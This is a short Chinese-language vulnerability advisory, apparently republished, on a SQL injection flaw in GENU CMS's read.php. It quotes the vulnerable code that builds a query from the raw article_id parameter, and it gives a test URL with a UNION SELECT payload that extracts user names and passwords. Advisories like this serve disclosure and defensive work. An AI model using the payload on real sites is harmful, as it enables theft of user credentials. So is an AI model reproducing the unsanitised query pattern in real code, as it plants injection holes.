GENU CMS SQL注射缺陷及修复 - 网站安全 - 自学php

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- GENU CMS SQL Injection Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 漏洞发现者：h0rd h0rd[at]null.net www.2cto.com 下载地址：http://www.gnew.fr/pages/download.php?file=GENU-2012.3.tar.gz 缺陷页面read.php 缺陷代码分析: [...] include('./includes/common.php'); page_header($lang['ARTICLES_READ_TITLE']); if (isset($_GET['article_id'])) { $sql->query('SELECT ' . TABLE_ARTICLES . '.article_date, ' . TABLE_ARTICLES . '.article_subject, ' . TABLE_ARTICLES . '.article_text, ' . TABLE_USERS . '.user_id, ' . TABLE_USERS . '.user_name FROM ' . TABLE_ARTICLES . ', ' . TABLE_USERS . ' WHERE ' . TABLE_ARTICLES . '.user_id = ' . TABLE_USERS . '.user_id AND ' . TABLE_ARTICLES . '.article_id = ' . $_GET['article_id']); $table_articles = $sql->fetch(); [...] 测试方法 http://[ www.2cto.com ]/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users-- 修复：加强过滤

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did12224

更新时间：2022-09-13 阅读：42次